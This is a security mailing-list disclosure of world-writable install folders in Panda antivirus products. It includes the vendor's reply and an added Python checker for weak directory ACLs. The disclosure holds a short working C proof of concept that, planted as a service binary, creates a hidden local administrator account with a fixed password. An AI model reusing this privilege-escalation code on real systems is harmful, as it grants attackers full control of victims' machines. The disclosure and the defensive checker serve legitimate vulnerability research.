Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities



Panda is really great and really fast. The bug was also reported on 16.07.06 to the beta team.




-------------------- 16.07.06 --------------------

Hi there,

I think there are some badly set filesystem permissions in your software.

FileSecure 7.01.10
C:\Programme\Panda Software\AVNT everybody full access

Titanium 2006 (5.03.00)
C:\Programme\Panda Software\ everybody full access

AntiVirus 2007 (2.00.80)
C:\Programme\Panda Software\ everybody full access

Platinum Internet Security 2006 (10.02.00)
C:\Programme\Panda Software\ everybody full access


It is possible to place a binary in the directory and let it execute at startup
as a service with system privs.

Example for AntiVirus 2007 (2.00.80):

Build it and place it in "C:\Programme\Panda Software\Panda Antivirus 2007"
(for an English Windows version, Program Files or something like this).


// --- pavsrv50.c ---
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* system() */

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"owner\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// --- pavsrv50.c ---


Sorry for my bad English :)

Tested on German Windows XP SP2 (all hotfixes) and German Windows 2k SP4 (all hotfixes).


btw. check the " if you install services

--------------------------------------------------


BTW: FileSecure 8.00.20 has the same vulnerability.

I think the best solution is to change the AV product.


Panda answer:
----------------- 21.07.06 -----------------------
Dear beta-tester,

Thank you very much for joining our beta program and reporting your tests so far.

We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet Security 2007" have a Shield to protect its processes and files.

All incidents and comments received will help us to build a better product.

Please, do not doubt to report us any other incident or query that you may have.

Best regards,

Beta Area
Quality Assurance Division
mailto:beta@xxxxxxxxxxxxxxxxx

Panda Software
Protection against viruses, spyware, hackers, spam and other Internet threats
Buenos Aires, 12
48001 BILBAO - SPAIN

--------------------------------------------------
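
An added defensive check, not part of the original message or of any Panda tooling: it resolves the directory a service binary runs from and flags ACL entries in `icacls` output that give broad groups write access there, which is the condition the report describes. The function names, the executable name `example_svc.exe` and both sample outputs are constructed for illustration, and the principal names assume an English Windows (plus "Jeder" for German).

```python
import ntpath
import re

# Principals that include unprivileged local users (English names; localized
# Windows uses others, e.g. "Jeder" for Everyone on German systems).
BROAD = {"everyone", "jeder", "builtin\\users",
         "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls rights that let a user create or replace files in a directory.
WRITE = {"F", "M", "W", "WD", "AD", "GA", "GW"}
ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")

def service_dir(image_path):
    """Directory of the executable named in a service ImagePath."""
    p = image_path.strip()
    if p.startswith('"'):                      # quoted: path ends at next quote
        exe = p[1:p.index('"', 1)]
    else:                                      # unquoted: cut at first ".exe"
        m = re.match(r"(?i)(.+?\.exe)\b", p)
        exe = m.group(1) if m else p
    return ntpath.dirname(exe)

def weak_aces(path, icacls_text):
    """Return (principal, rights) for allow ACEs giving broad groups write access."""
    findings = []
    for line in icacls_text.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):   # first line repeats the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        who, flags = m.group(1), re.findall(r"\(([^)]*)\)", m.group(2))
        if "DENY" in flags or who.lower() not in BROAD:
            continue
        if set(flags[-1].split(",")) & WRITE:       # rights are the last group
            findings.append((who, flags[-1]))
    return findings

# Constructed sample: `icacls "<dir>"` output for a world-writable directory.
SAMPLE_DIR = r"C:\Program Files\Panda Software"
SAMPLE_WEAK = r"""C:\Program Files\Panda Software Everyone:(OI)(CI)(F)
                                BUILTIN\Administrators:(OI)(CI)(F)
                                NT AUTHORITY\SYSTEM:(OI)(CI)(F)
"""
# Constructed sample: the same directory with a restrictive ACL.
SAMPLE_OK = r"""C:\Program Files\Panda Software BUILTIN\Users:(OI)(CI)(RX)
                                BUILTIN\Administrators:(OI)(CI)(F)
"""
```

On a live system the text passed to weak_aces would come from running icacls on each directory returned by service_dir, including its parent directories.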


